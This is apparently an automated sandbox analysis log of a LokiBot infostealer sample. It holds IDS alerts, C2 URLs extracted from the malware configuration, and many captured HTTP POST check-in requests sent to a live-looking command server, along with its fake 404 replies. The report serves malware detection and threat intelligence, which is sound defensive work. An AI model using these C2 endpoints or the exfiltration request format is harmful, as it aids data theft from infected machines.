Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50010 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50010 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50020 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50020 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50018
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50020 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50020 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50020 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50038
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50010 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50010 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50020
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50027 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50027 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50027 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50027 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50027 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50007 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50007 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50007 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50007 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50007 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50012 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50012 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50012 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50012 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50012 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50027
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50010
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50021 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50021 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50021 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50021 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50021 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49804 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49804 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49804 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50026 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50026 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50026 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50026 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50026 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50035 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50035 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50035 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49804 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49804 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50035 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50035 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50035
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50022 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50022 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50022 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50022 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50022 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50022
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50025 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50025 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50025 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50025 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50025 -> 104.21.80.1:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.80.1 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View	IP Address: 104.21.80.1 104.21.80.1

Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 153Connection: close

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\PRI_VTK250419A.exe

Code function: 0_2_00C422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00C422EE

Source: global traffic

DNS traffic detected: DNS query: touxzw.ir

Source: unknown

HTTP traffic detected: POST /scc1/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FC79CF12Content-Length: 180Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hyuiIlX64GJyz%2FqqhT%2FPZbP%2B7Sw%2FfycEQR4Q%2BOS%2F7SDMyP5GTymgHM7WrUhFXM9XfTUNbCZAWt8bFYGrz6PvsGg1OaoNzY9dHk%2BvZe3Yd6BjFXo4GhCy4mvyYCI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786e657ba372b9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2124&min_rtt=2124&rtt_var=1062&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=419&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 14:37:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LsP5XDFuUDeHwcdBLZfqqb%2BU1E4KVO8%2Fwq%2BChAnpgcRpfwmhdN8DjBVLJwXn0GlNRDiehufTtH3IjFY%2Fonv9fKXC5mDAP8Ls%2F%2Bl8Yay%2Bh19Q6edAWF5wFP16IxI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91786e839b5e727d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1987&rtt_var=993&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
